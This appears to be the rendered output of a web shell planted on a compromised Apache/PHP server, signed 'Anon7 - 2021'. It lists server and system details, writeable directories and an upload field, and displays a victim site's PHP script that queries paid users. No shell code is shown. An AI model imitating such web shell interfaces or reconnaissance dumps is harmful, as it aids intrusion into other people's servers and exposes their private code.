KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17
System : Linux localhost 2.6.18-419.el5 #1 SMP Fri Feb 24 22:47:42 UTC 2017 x86_64
User : nobody ( 99)
PHP Version : 5.2.17
Disable Function : NONE
Directory :  /home/queenjbs/www/test/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/queenjbs/www/test/code_update.php
<?include $_SERVER['DOCUMENT_ROOT']."/conf/conf_dir.php";?>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?

//유료회원일때 코드 1번부터 넣어준다.
$QUERY_PAGE  = "
SELECT id FROM user WHERE auth_code =10 and activated=1 order by id asc
";
$result= mysql_query($QUERY_PAGE,$db_con);
$i = 1;
while($row = mysql_fetch_array($result)) {


			echo $queryupok2 = "update ACTION_JUNSU_CODE set user_idx='$row[id]' where no = '$i'";
			echo "<br/>";
			//$queryupok_result = mysql_query($queryupok2,$db_con);

$i++;
}
echo "end";

?>

Anon7 - 2021